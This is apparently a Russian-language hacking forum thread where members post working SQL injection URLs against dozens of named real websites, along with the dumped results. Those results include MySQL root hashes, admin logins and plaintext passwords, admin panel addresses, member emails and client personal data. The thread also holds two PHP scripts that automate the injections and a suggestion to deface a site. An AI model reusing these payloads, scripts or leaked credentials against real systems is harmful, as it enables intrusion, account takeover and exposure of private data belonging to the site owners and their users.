falconleader.eu
http://www.falconleader.eu/index.php?cat=1&id=2&pid=-1+union+select+1,concat_ws(0x3,version(),user(),da tabase()),3,4,5,6,7,8,9,10,11,12/*
5.0.27fiorano@dedik-192.nebula.fifiorano
http://www.falconleader.eu/index.php?cat=1&id=2&pid=-1+union+select+1,concat(name,0x3,passw),3,4,5,6,7, 8,9,10,11,12+from+users/*
Sampsa346a55ca940cea871ae30d7c605c0b8a

openworld.gov
_http://www.openworld.gov/article/print.php?id=1 and 1=1
_http://www.openworld.gov/article/print.php?id=1 and 1=2

http://www.fromthetop.org/

PR:6

http://www.fromthetop.org/Programs/Performers.cfm?pid=-1+union+select+1,2,concat(user,0x3a,password),4,5, 6,7+from+mysql.user/*

root:*CF57A666D82A1A6E307947399943403DD93CF490

Выводит всю базу .

<?
echo "<pre>\n";
@set_time_limit(0);
@ini_set("display_errors","0");
$hostname = gethostbyname('fromthetop.org');
function from($from)
{
global $hostname;
$responce = "";
$fsock = fsockopen($hostname,80,$errnum,$errstr,2);
$headers = "GET hhttp://www.fromthetop.org/Programs/Performers.cfm?pid=-1+union+select+1,2,concat(user,0x3a,password),4,5, 6,7+from+$from/* HTTP/1.1\n";
$headers .= "Host: my-photo.ru\n";
$headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n";
$headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
$headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n";
$headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n";
$headers .= "Keep-Alive: 500\n";
$headers .= "Connection: close\n";
$headers .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
fwrite ($fsock,$headers);
while (!feof($fsock)) $responce .= fread($fsock,1024);
fclose ($fsock);
$patern = "#<[\s]*sqlinj[\s]*>([^<]*)<[\s]*/sqlinj[\s]*>#i";
if(preg_match($patern, $responce, $rez)) echo $rez[1]; else echo 'Something not right...';
//echo $responce;
}
from("mysql.user");
echo "</pre>";
?>

http://www.leuragardensfestival.com.au/page.php?id=-23+un ion+select+1,2, 3,4,5,6,7, 8,9,0/*

version :4.0.15-Max
user: leuragar@localhost
database : leuragar_db

http://www.poznay-mir.ru/tourist.php?uid=-1+union+select+1,2,3,4,version()/*

http://www.floraindia.com
http://www.floraindia.com/details.cfm?PID=1+or+1=(SELECT+TOP+1+cast(email+as +nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarchar) +FROM+membermaster)--
http://www.floraindia.com/details.cfm?PID=1+or+1=(SELECT+TOP+1+cast(username +as+nvarchar)%2Bchar(58)%2Bcast(pwd+as+nvarchar)+F ROM+users)--

http://www.highwayafrica.ru.ac.za PR:5
http://www.highwayafrica.ru.ac.za/page.cfm?pID=-1+union+select+1,2,unhex(hex(concat(user,0x3a,pass word))),4,5+from+mysql.user/*
root:*78961DCFDA81834DF8D39AB3BDFD900D16809523
http://www.highwayafrica.ru.ac.za/page.cfm?pID=-1+union+select+1,2,unhex(hex(concat(username,0x3a, userpassword))),4,5+from+admin/* admin:highwayafrica

Админка:http://www.highwayafrica.ru.ac.za/admin/login.cfm

neeblee.com
http://www.neeblee.com/plaincart/index.php?c=39&p=-33+union+select+1,concat_ws(0x3,user_name,user_pas sword),3,4,5+from+tbl_user/*

arcdi.com
http://www.arcdi.com/trainers.php?id=-33+union+select+1,concat(username,0x3a,password),3 ,4,5+FROM+users%20--

случайно попал на сайт и заметил - может кто чёнть с ним придумает...
blind sql inject:
http://www.microstar.ru/program/products/notebook/nb/pro_nb_selling.php?UID=630%20and%201=1

http://www.globaleconomicgovernance.org/research.php?id=-1+union+select+1, concat(version(),0x3a,database(),0x3a,user()),3,4, 5,6,7/*

version: 5.0.45 log
db name: db158065722
user: dbo158065722@212.227.118.42

http://www.landbigfish.com

http://www.landbigfish.com/tacklestore/showcase.cfm?PID=1+or+1=(SELECT+TOP+1+cast(usernam e+as+nvarchar)%2Bchar(58)%2Bcast(password+as+nvarc har)+FROM+AdminUsers)--

yamaha-service.de
http://www.yamaha-service.de/cat1.php?archivset=1&newsset=&idcat1=-1+union+select+all+1,username,3,password,5+from+us ers--

www.relevantmagazine.com
http://www.relevantmagazine.com/pc_article.php?id=-1+union+all+select+1,2,3,4,5,concat(user,char(58), pass),7,8,9,10,11,12,null,14,15,16,17,18,19,20+fro m+admin/*

rib-racers.com
http://www.rib-racers.com/index.php?id=-2+union+select+1,concat_ws(0x3,version(),user(),da tabase()),3,4,5,6,7,8,9,10/*
5.0.45-logribs@cgi1203.int.bizland.netribs
http://www.rib-racers.com/index.php?id=-2+union+select+1,concat_ws(0x3,fname,sname,usernam e,password),3,4,5,6,7,8,9,10+from+reg/*
PeterJohnsonbloggs3823a5ee1f831626:peter

Вот три хоста на одном сервере

binar-design.bizhttp://binar-design.biz/web/index.php?idk=5-1 AND 1=0 UNION SELECT 1,2,COUNT(CONCAT_WS(0x203a20,TABLE_SCHEMA,TABLE_NA ME)),4,5,6 FROM INFORMATION_SCHEMA.TABLES-- fв бд никаких полезных таблиц нету :(



mobilka.com.uahttp://mobilka.com.ua/games/download.php?id=393-1 AND 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- dполезная таблица user в ней столбцы id,login,pass но похоже она пустая =\


samba.org.uahttp://samba.org.ua/articles/?section=2-1 AND 1=0 UNION SELECT 1,2,COUNT(CONCAT_WS(0x203A20,TABLE_SCHEMA,TABLE_NA ME)),4 FROM INFORMATION_SCHEMA.TABLES-- f
это уже интереснее, три таблицы с юзерами:
1)user пустая
2)sis_users вот отседа:Guest : Guest :
Petro : 6216f8a75fd5bb3d5f22b6f9958cdede3fc086c2 (111)
Vlas : 011c945f30ce2cbafc452f39840f025693339c42 (1111)
3)users из этой таблицы:Vlas : 2a062126ee92cb96a03bef1eb1008c4d (armagedon)
tema_c : 698d51a19d8a121ce581499d7b701668 (111)
Uncnovn : 3f230640b78d7e71ac5514e57935eb69 (qazxsw)

http://www.ub.bw
http://www.ub.bw/news.cfm?pid=221&t=-1+union+select+1,2,concat(user,0x3a,password),4,5, 6,7,8,9,10,11,12,13,14,15+from+mysql.user/*
root:*523D4E56011212768221213AC39698CEC334CD28
ubcms:3f29838236c2615f
webadmin:*B3AD4B00674739CBE6300BA8A38EBB04C6A1526A
webadmin:5c42f6195bd93698
mysql:*E74858DB86EBA20BC33D0AECAE8A8108C56B17FA

chtoikak.com
http://chtoikak.com/index.php?id=882+union+select+1,concat_ws(0x3,vers ion(),user(),database()),3,4,5,6,7,8/*
4.1.22-standardoptimasi_bw@localhostoptimasi_BeautyWorl d
http://chtoikak.com/index.php?id=882+union+select+1,concat(user,0x3,pa ss),3,4,5,6,7,8+from+users+limit+1,1/*
adminadmin ^^
http://chtoikak.com/index.php?id=882+union+select+1,concat_ws(0x3,logi n,passw,email),3,4,5,6,7,8+from+reg+limit+1,1/*
vlapron260561954vlapron@bk.ru

http://www.mnsafetycouncil.org PR:5
http://www.mnsafetycouncil.org/products/product.cfm?PID=1+or+1=(SELECT+TOP+1+cast(LoginNam e+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarc har)+from+users)--

Http://npo.karelia.ru/ скока не копался ничего кроме
Результаты поиска
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''''' at line 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or e_text_full like '%'''%'' at line 1

Вы искали - '''

Совпадений не найдено, попробуйте изменить искомое слово.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or e_text_full like '%'''%' ORDER BY e_id DESC limit 0,15' at line 1
Может кто пограмотнее поможет!
А я так просто учусь.. пока мало чего понимаю. Может подскажите сайтик на котором попрактиковатся можно..

http://www.thefrantics.com/
http://www.thefrantics.com/index.cfm?PID=1+or+1=(SELECT+TOP+1+cast(Username+a s+nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarchar )+from+Users)--

to Assembler:

http://npo.karelia.ru/?view=event&id=0+union+select+1,concat_ws(0x3,version(),user() ,database()),3/*

http://npo.karelia.ru/?view=event&id=0+union+select+1,concat(u_name,0x3,u_pass),3+fr om+vs_users/*

http://npo.karelia.ru/admin

PS: и не фурыкает чет, мож кто абразумит почему :rolleyes:

to Assembler:



http://npo.karelia.ru/admin

PS: и не фурыкает чет, мож кто абразумит почему :rolleyes:
там бейсик авторризация. Скорее всего с базой не связано

2Assembler, не знаю насчет поиска (проверять лениво было), но на сайте была лобовая инъекция в параметре id в index.php. Вот, кстати, и она:
http://npo.karelia.ru/?view=event&id=-1+UNION+SELECT+VERSION(),2,3/*
Версия БД 5 - можно свободно извлечь таблицы и столбцы.
Идем дальше: самой интересной таблицей, на мой взгляд, является "org.vs_users" с полями "u_id", "u_name", "u_pass", "u_level". Делаем запрос:
http://npo.karelia.ru/?view=event&id=-1+UNION+SELECT+concat_ws(0x3a,u_id,u_name,u_pass,u _level),2,3+FROM+org.vs_users/*
Видим аккаунт администратора, где пароль в незашифрованном виде:
1:admin:nko:1
Вот и все... Получился даже мини-FAQ :).

P.S. Лучше служить закону, чем нарушать его, взлом - зло! Помни о 272 статье УК РФ и о моральных принципах!

http://www.goalqpc.com/ PR:5
http://www.goalqpc.com/shop_products_detail.cfm?PID=-1+union+select+version(),2,concat(user,0x3a,passwo rd),4,5,6,7,8,9,10,11,12,13,14+from+mysql.user/*
root:*4148C7277489C55E5A3F49CD1D020FCBE8778C3A
http://www.goalqpc.com/shop_products_detail.cfm?PID=-1+union+select+concat_ws(0x3a,UserEmail,UserPasswo rd),2,3,4,5,6,7,8,9,10,11,12,13,14+from+admin+limi t+0,1/*
admin@goalqpc.com:deming123
support@newcastleweb.com:swissthins

Админка:
http://www.goalqpc.com/admin/
Юзеры:
http://www.goalqpc.com/shop_products_detail.cfm?PID=-1+union+select+concat(useremail,0x3a,userpassword) ,2,3,4,5,6,7,8,9,10,11,12,13,14+from+user+limit+80 00,1/*
~8000 мемберов, пароли в открытом виде.

Дом 3

http://www.dom3.ru/cgi-bin/dating.pl?action=search2&mode=html&se=-35'+union+select+1,2,3,4,table_name,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35+from+information_schema.tabl es/*&v1=18'&v2=19&re=57&fo=1&dom=1&x=16&y=12
мда

А как можно посмотреть пароль и админку?
ОМГ убери пробелы из ссылки :D
Можете ктонить помоч с http://www.proline.lv/lv/brandlines?brandID=1&confID=' там чтоли фильтр стоит?Вывод:
_http://www.proline.lv/lv/brandlines?brandID=1&confID=-2+union+select+1,2,user(),4,version(),6,7,8,9,0,11 ,12,13,14/*

http://www.ask4ufe.com
http://www.ask4ufe.com/transcript.cfm?pid=1+or+1=(SELECT+TOP+1+cast(Usern ame+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nva rchar)+from+Users)--

http://www.sequa.de Pr5
http://www.sequa.de/index.php?categ=-1+union+select+1,concat(version(),0x3a,user(),0x3a ,database()),3/*&parent=0&p=downloads&area=1

CinemaBlend.Com

http://www.cinemablend.com/news.php?cid=1+union+select+1/*

http://www.pangeaday.org

PR=6

http://www.pangeaday.org/filmDetail.php?id=2+ union+select+1,2,3,4,5,6,concat(database(),0x3a, version(),0x3a,user()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23/*

database: pangea
version: 5.0.22-log
user: dr30628@192.168.1.134

http://www.austadiums.com/stadiums/stadiums.php?id=-1+union+select+1,2,concat_ws(0x3a,nick,password,em ail),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9+from+usuarios+limit+0,1/*
austadiums:auuMTgEV9/KAA

http://www.austadiums.com/stadiums/stadiums.php?id=-1+union+select+1,2,concat_ws(0x3a,user,pass,access ,secret),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 ,5,6,7,8,9+from+sympoll_auth/*
7c485725fbe136da96b2c9bc8e182999:m1shka505
c27f50fdbc6e40bef29c198d6d209b0c

====================================

http://www.comicus.it/view.php?section=interviste&id=-160+union+select+1,2,3,concat_ws(0x3a,username,pas sword,mail),5,6,7+from+users/*
boss:maerro

====================================

http://www.theshiznit.co.uk/review.php?id=-251+union+select+1,2,3,4,5,6,concat_ws(0x3a,id,nic kname,md5id,password,email),8,9,0,1,2,3,4,5,6,7,8, 9,0,1,2,3,4+from+shiznit_users+where+nickname='Bob '/*
Bob:6b333422e6af650594854e99ecca5fc8:shizzy1

====================================

http://www.isra.com/news/page_print.phtml?item=93478+and+1=0+union+select+c oncat_ws(0x3a,user,password,host),2,3,4,5,6,7,8,9+ from+mysql.user/*

kamtec:1b8bd1736ab19985:kamtec112
http://admin.isra.com/
http://sales.isra.com/admin/index.php
но пасс не идёт

====================================

http://www.amg.com.af/index.php?fuseaction=section.main&id=-13+union+select+1,2,3,concat(username,0x3a,passwor d),5,6,7,8+from+usr+limit+0,1/*
ckaminsky:7b490bbc3fa14869283ee2a6b4c49f1b:vivacol orado
gfranklin:5f4dcc3b5aa765d61d8327deb882cf99:passwor d

www.fondationbrigittebardot.fr

PR=5

http://www.fondationbrigittebardot.fr/site/actu_en.php?id=75018+union+select+AES_DECRYPT(AES_ ENCRYPT(concat(user(),char(58),version(),char(58), database()),0x71),0x71),2/*

database: fonbriba
version: 4.1.11-Debian_4sarge7-log
user: fonbriba@localhost

P.S.Спасибо jokester'y.

Напомню правила темы:

https://forum.antichat.ru/showpost.php?p=392272&postcount=2

Выставление репутации в темах:

SQL Инъекции
PHP Иньекции
Пассивные XSS
Активные Xss
Админки

В связи с участившимися случаями накрутки репутации, при выставление репутации в этих темах ограничтесь её кол-вом от 1 до 3.

При оценивание постов этих темах, старайтесь сделать это как можно более рационально - не стоит ставить +3 за каждый пост, выбирайте наиболее объективную оценку.

Несоблюдение этого правила (высталение большего кол-ва репутации) будет говорить о накрутки репутации.

Накрутка репутации будет пресекаться минусами.

Посмотрел репутацию пользователей которые тут постили инъекции:

+5 SQL Инъекции 22.05.2008 20:12 Ded MustD!e расти большой)
Поставленно за это: https://forum.antichat.ru/showpost.php?p=698956&postcount=5565

+5 SQL Инъекции 20.05.2008 22:44 zl0ba За активность в теме "SQL inj"
Поставленно за это: https://forum.antichat.ru/showpost.php?p=689954&postcount=5541

Не знаю что вы нашли там полезного, ровно как и полезного в активности в этой теме в выкладывание инъекций, выводящих версии, но подобные случаи будут считаться накруткой репутации и за это будут выставляться минусы.

Так же напомню что выкладывать нужно только раскрученные инъекции (см первый пост темы).

Не понятно зачем писать ПР/ТИЦ и т.д. но при этом выводить только версию БД, не можете нормально раскрутить инъекцию, но хотите побольше плюсиков?

Тема не для вопросов/ответов, для этого есть другая тема - вопросы/ответы в этой теме считаються оффтопом, а за оффтоп ставяться минусы.


Возмущайтесь в другом месте, обсуждение действий модератора в несоответсвующем разделе будут пресекаться (Const)

выводит INFORMATION_SCHEMA.TABLES
с сайта samba.org.ua

<?
echo "<pre>\n";
@set_time_limit(0);
@ini_set("display_errors","0");
$hostname = gethostbyname('samba.org.ua');
function info($info)
{
global $hostname;
$responce = "";
$fsock = fsockopen($hostname,80,$errnum,$errstr,2);
$headers = "GET http://samba.org.ua/articles/?section=2-1 AND 1=0 UNION SELECT 1,2,COUNT(CONCAT_WS(0x203A20,TABLE_SCHEMA,TABLE_NA ME)),4 FROM $info HTTP/1.1\n";
$headers .= "Host: my-photo.ru\n";
$headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n";
$headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
$headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n";
$headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n";
$headers .= "Keep-Alive: 500\n";
$headers .= "Connection: close\n";
$headers .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
fwrite ($fsock,$headers);
while (!feof($fsock)) $responce .= fread($fsock,1024);
fclose ($fsock);
$patern = "#<[\s]*sqlinj[\s]*>([^<]*)<[\s]*/sqlinj[\s]*>#i";
if(preg_match($patern, $responce, $rez)) echo $rez[1]; else echo 'Something not right...';
//echo $responce;
}
info("INFORMATION_SCHEMA.TABLES");
echo "</pre>";
?>

http://www.verbste.kz
http://www.verbste.kz/ecommerce/index.php?idr=100+union+select+1,2,3,4,5,6+/*
database: verbste_verbste
user: verbste_verbste@localhost
version: 4.1.22-standard

http://www.kro.su
http://www.kro.su/news/foto/more/?pid=-1+UNION+SELECT+1,2,3,4,5,6,7/*
user: krosu_user@localhost
database: krosu_main
version: 4.1.22-standard-log

nickjacobsen.com
http://www.nickjacobsen.com/index.php?id=2+union+select+1,2,3,unhex(hex(concat _ws(0x3,version(),user(),database())))/*
5.0.18web12@localhostusr_web12_1
http://www.nickjacobsen.com/index.php?id=2+union+select+1,2,3,concat(username, 0x3,password)+from+members+limit+1,1/*
web12L3Ahzh09

Shoptop.kiev.ua - магазин

http://www.shoptop.kiev.ua/news_info.php?id=-1+union+select+1,table_name,3,4,5,6+from+informati on_schema.tables+limit+1,100/*&url=http://warezzz.biz

Mobiman.com.ua - Интернет магазин.

http://www.mobiman.com.ua/info_pages.html?pgID=17'+union+select+1,2,3,concat (user(),0x3a,database(),0x3a,version()),5/*


Instore.kz - интернет магазин. 2 колонки)

http://instore.kz/rss.php?language=17'+union+select+1/*&url=http://warezzz.biz


http://shop.sportmaster.ru/?cat_id=31796&cat_vendor[]=HEAD&cat_vendor[]=WILSON&cat_sort_url=sort&cat_sort_url=cost&cat_sort_url='

http://www.yug.odessa.ua/new/view.php?tid=-1+UNION+SELECT+1,2,3,4,5,6&tr=a еще одна.

http://www.aei.brookings.org/

http://www.aei.brookings.org/publications/abstract.php?pid=-296+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,con cat_ws(0x3a,version(),user(),database()),15,16,17, 18,19/*
4.0.25-standard-log:aei_brookings@10.225.135.70:aei_brookings

Еще парочка:
http://www.trigeneve.ch/news_fichiers/news.php?mode=voir&nb=1+UNION+SELECT+1,2,3,4,concat_ws(0x3b,pseudo,pa ss,email),6,7+from+tr_user_news/*

--------------------------------
http://www.pulp-world.com/trigeneve/news_fichiers/news.php?mode=voir&nb=1+UNION+SELECT+1,2,3,4,concat_ws(0x3b,pseudo,pa ss,email),6,7+from+tr_user_news/*

---------------------------------
http://www.srib.be/index.php?option=com_filiale&idFiliale=-1+union+select+1,password,3,4,username,6,7,8,9,10, 11+from+jos_users/*

И

http://www.dddhouse.com/v3/product_details.php?ProductID=8416&LanguageID=1+order+by+1/* - Тут что-то, у меня не получается дальше продвинуться.

33x.ru - Интернет Магазин

http://www.33x.ru/index.php?shopping_cart=yes&add2cart=17'+union+select+1/*

осталось подобрать колонки, вчера в 3 часа ночи дотыкал до 30 и забил))

www.hcvolga.ru - сайт хоккейного клуба Волга


http://www.hcvolga.ru/?id=-1+union+select+1,2,3,concat_ws(0x3,user(),version( ),database()),5/*

hcvolga7@v29.valuehost.ru4.0.27-max-loghcvolga7

www.fcvu.ru - официальный сайт футбольного клуба Волги :D

http://www.fcvu.ru/?id=-1+union+select+1,2,concat_ws(0x23,user(),version() ,database()),4,5,6/*

fcvu131@217.112.35.22#5.0.45-log#fcvu131

http://www.aziendeinvista.it/view_news.asp?id=-1+union+select+1,concat_ws(0x3a,Admin,Passw),3,4,5 ,6,7+from+admin%23
http://www.aziendeinvista.it/

zavarka.ru
http://zavarka.ru/texts/cgi-bin/show.cgi?id=999999+union+select+1,2,3,4,version(), 6,7,8/*

надо сделать дефейс: "дрочить вредно") :D

http://www.ultimatemyspace.com/preview.php?id=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6+from+users--

http://www.htfi.org/index.php?p=-1+union+select+1,concat(email,0x3a,password),3,4,5 ,6,7,8+from+users/*

www.htfi.org

stickfiggers.com
http://www.stickfiggers.com/index.php?id=-2+union+select+concat_ws(0x3,version(),user(),data base()),2,3,4,5/*
5.0.45-community-logstickfig_peonfig@localhoststickfig_stickfigs
http://www.stickfiggers.com/index.php?id=-2+union+select+concat_ws(0x3,username,password,nam e,email),2,3,4,5+from+admin/*
stickmang0f1ggerzBeauadmin@stickfiggers.com

Админка:
http://www.stickfiggers.com/admin/

Довольно интересный сайт, но вытащить оттуда, ничего не получилось :`(
http://www.sportfinder.ru/show_sites.php?query_type=-9+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11,12,13,14/*
4.0.27-log:wushu@pm3.zenon.net:wushu

nevadabighornbaseball.com
http://www.nevadabighornbaseball.com/index.php?id=-6+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(concat_ws(0 x3,version(),user(),database()),0x71),0x71)/*
5.0.45-lognevadabighorn@68.178.254.123nevadabighorn
http://www.nevadabighornbaseball.com/index.php?id=-6+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3, (SELECT+CONCAT(username,0x3,password,0x3,email)+FR OM+nevadabighorn.pages_t_users+LIMIT+1,1)),0x71),0 x71)/*
nevadabighornHumbaby543webmaster@nevadabighornba seball.com

nevadabighornbaseball.com
http://www.nevadabighornbaseball.com/index.php?id=-6+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(concat_ws(0 x3,version(),user(),database()),0x71),0x71)/*
5.0.45-lognevadabighorn@68.178.254.123nevadabighorn
http://www.nevadabighornbaseball.com/index.php?id=-6+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3, (SELECT+CONCAT(username,0x3,password,0x3,email)+FR OM+nevadabighorn.pages_t_users+LIMIT+1,1)),0x71),0 x71)/*
nevadabighornHumbaby543webmaster@nevadabighornba seball.com

Momiji, извини за совет но ты ошибся кое где))
может тебе это нравится, но лучше использовать вместо:
0x3
0x3a

http://www.rdu.org.ua/news.php?content=-1+union+select+1,header,null,id+from+news/*

www.rdu.org.ua

odnoklassniki.ru

Blind SQL[color]

http://rabota.odnoklassniki.ru/content/vacancies/search.html?region=2&s=33&payment_to=300&limit=10+--+&payment_from
http://rabota.odnoklassniki.ru/content/vacancies/search.html?s=19&company_type=agency%27&limit=5+--+


[color=grey]
Отображение Flash баннера вверху.

2 КВР
Может я не вкуриваю что-то,не мог бы ты объяснить, что это?
И зачем это развешивать по всему форуму?
_https://forum.antichat.ru/showpost.php?p=705692&postcount=2093
_http://forum.antichat.ru/thread71552.html

http://www.funnymoneyreport.com/news.php?id=-1+union+select+id,2,date,4,5,6+from+news/*

www.funnymoneyreport.com

http://www.skaterockshop.cz/index.php?feMenu=product&grSelected=&prodSelected=-12+UNION+SELECT+1,2,3,4,5,A ES_DECRYPT(AES_ENCRYPT(C ONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2 A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A6 56E64),0x71),0x71),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29/*


Version: 5.0.45-Debian_1ubuntu3-log
Database: bikepark
User: bikepark@localhost

http://www.skaterockshop.cz/admin.php

table_name=mystic_users
columns in this table : Name
Username
Password

ЗЫ.Grey извини, но больше не буду выкладывать на обозрение всех киндерофф...а знающему я думаю это более чем достаточно.

http://www.masterkit.ru/info/linkgroup.php?num=-1+union+select+concat_ws(0x3a,version(),database() ,user())--

4.0.27:masterkit:mk-base@localhost

http://www.9955599.ru/jobsect.php?section=-23+union+select+1,concat_ws(0x3a,version(),user(), database())/*
4.1.22:telgaz_mysql@212.193.227.34:telgaz_db
собственно скуль есть... просто с таблицами заморачиваться впадлу было=)

Компания "Чёрный лес"

http://www.blackwood.ru/main.php?id=537'
http://www.blackwood.ru/main.php?id=537+AND+1%3Cascii(substring(VERSION(), 2,1))

VERSION(): 5.0.37-log

Названия таблиц
an_format
an_mag
an_news
an_qpstate
an_quest
an_qwstate
an_speaker
an_staff
an_users
ap
ap_adm_raions
ap_fields
ap_house_types
ap_metro
ap_opts
apt_adm_raions
apt_ap
apt_apimg
apt_cot_roads
apt_cot_sectors
apt_ns_bld
apt_schools
apt_web_titles
art_blocks
articles
blackwood_en_content
blackwood_en_content_analit
blackwood_en_content_analit_file
blackwood_en_content_cat
blackwood_en_content_corp
blackwood_en_content_first
blackwood_en_content_key
blackwood_en_content_key_dop
blackwood_en_content_main
blackwood_en_content_news
blackwood_en_content_press
blackwood_en_content_razdel
blackwood_en_content_riel
blackwood_en_content_ruk
blackwood_en_content_text
blackwood_en_content_zar
blackwood_en_images
blackwood_en_select
blackwood_en_select_detail
blackwood_en_template
blackwood_en_template_details
blackwood_en_users
blackwood_en_vote
blackwood_en_vote_details
blackwood_fr_content
blackwood_fr_content_analit
blackwood_fr_content_analit_file
blackwood_fr_content_cat
blackwood_fr_content_corp
blackwood_fr_content_first
blackwood_fr_content_key
blackwood_fr_content_key_dop
blackwood_fr_content_main
blackwood_fr_content_news
blackwood_fr_content_press
blackwood_fr_content_razdel
blackwood_fr_content_riel
blackwood_fr_content_ruk
blackwood_fr_content_text
blackwood_fr_content_zar
blackwood_fr_images
blackwood_fr_select
blackwood_fr_select_detail
blackwood_fr_template
blackwood_fr_template_details
blackwood_fr_users
blackwood_fr_vote
blackwood_fr_vote_details
blackwood_ru_content
blackwood_ru_content_analit
blackwood_ru_content_analit_file
blackwood_ru_content_cat
blackwood_ru_content_corp
blackwood_ru_content_first
blackwood_ru_content_key
blackwood_ru_content_key_dop
blackwood_ru_content_main
blackwood_ru_content_news
blackwood_ru_content_press
blackwood_ru_content_razdel
blackwood_ru_content_riel
blackwood_ru_content_ruk
blackwood_ru_content_text
blackwood_ru_content_zar
blackwood_ru_images
blackwood_ru_select
blackwood_ru_select_detail
blackwood_ru_template
blackwood_ru_template_details
blackwood_ru_users
blackwood_ru_vote
blackwood_ru_vote_details
blackwood_so_content
blackwood_so_content_analit
blackwood_so_content_analit_file
blackwood_so_content_cat
blackwood_so_content_corp
blackwood_so_content_first
blackwood_so_content_key
blackwood_so_content_key_dop
blackwood_so_content_main
blackwood_so_content_news
blackwood_so_content_press
blackwood_so_content_razdel
blackwood_so_content_riel
blackwood_so_content_ruk
blackwood_so_content_text
blackwood_so_content_zar
blackwood_so_images
blackwood_so_select
blackwood_so_select_detail
blackwood_so_template
blackwood_so_template_details
blackwood_so_users
blackwood_so_vote
blackwood_so_vote_details
bpr_attr
bpr_attr_cat
bpr_attr_hse
bpr_attr_hse_cat
bpr_directs
bpr_land
bpr_lists
bpr_lists_cat
bpr_lnd_pics
bpr_raions
bpr_sectors
bpr_streets
bpr_templ_fields
bpr_towns
clients
holiday
jelto_links
jelto_mail
jelto_mail_en
job
news
ofs_bld_pics
ofs_buildings
ofs_mtr_rad
ofs_mtr_sec
ofs_off_pics
ofs_offices
ofs_ofs_targets
ofs_ofs_types
ofs_web_titles
sch_class
sch_deal
sch_objects
sch_pics
sch_raions
sch_types
sch_users
sub_report
users
vacancy
vap
vs_area
vs_metro
vs_mtr_line
vs_offers
vs_query
vs_sent
vs_street


Названия колонок + содержимое
**************************************************
users (5 записей)
--------------------------------------------------
usr_name
usr_passw
usr_status
usr_obj_id


hr, pr869, 2, 0
ib, suvorov99, 1, 0
maxim, hr384, 3, 0
pr, ib632, 4, 0
sub, sub235, 5, 0
**************************************************
an_staff (17 записей)
--------------------------------------------------
asf_name
asf_adname

Широкова Ольга, shirokova
Соколова Анна, sokolova
Голубков Максим, golubkov
Мамохина Александра, mamokhina
Манн Вероника, mann
Степаненко Алексей, stepanenko
Домченкова Елена, domchenkova
Шлеленко Нина, shlelenko
Симонова Екатерина, simonova
Карпова Ольга, karpova
Петрачкова Галина, petrachkova
Гулин Антон, gulin
Щаденко Нина, schadenko
Лобанова Анастаси, lobanova
Данченок Анна, danchenok
Оагнезова Наталь, oganezova
Фирскина Елена, firskina
**************************************************
an_users (1 запись; modus, Mod6382, 2, 0)
--------------------------------------------------
usr_name
usr_passw
usr_status
usr_obj_id
**************************************************
an_speaker (2 записи)
-------------------------------------------------
asp_name
asp_adname


Гец Михаил, gets
Литинецка, marsha
**************************************************
an_quest (3 записи)
--------------------------------------------------
aqs_date
aqs_amg_id
aqs_title
aqs_ldate
aqs_ast_id
aqs_pdate
aqs_asp_id
aqs_asf_ids
aqs_text
aqs_afm_id
aqs_fpdate
aqs_lpdate
aqs_note
aqs_jorname
aqs_ansdate
aqs_state
aqs_modif
aqs_lhour
*************************************************
ap_adm_raions
-------------------------------------------------
arn_title_rs
arn_title_en
*************************************************
blackwood_en_users (1 запись; user, user, admin)
-------------------------------------------------
name
pass
type
razdel
*************************************************
blackwood_ru_users (1 запись; user, user, admin)
-------------------------------------------------
name
pass
type
razdel
*************************************************
clients (20 записей)
-------------------------------------------------
cln_name1
cln_name2
cln_name3
cln_email
cln_login
cln_password
cln_company
cln_tel
cln_text



Ковалев, Константин, Николаевич, kovalev@blackwood.ru, 179, 7907143228d532cf, , 9154000,
Фадеева, Марина, Викторовна, marina@blackw.dol.ru, aniram, 0e08af0332b7c218, , 730-20-00,
Света, Света, Света, ritter@blackwood.ru, aspirant, 523905757f41e147, , 9154000,
Уль, Уль, Уль, uliana@blackwood.ru, booky, 01836fac1c7fed0d, , 995-5961,
Кулешов, Владимир, Викторович, vlad_victor@yahoo.com, bukalov, 39a9a3b45284239e, , 7648677,
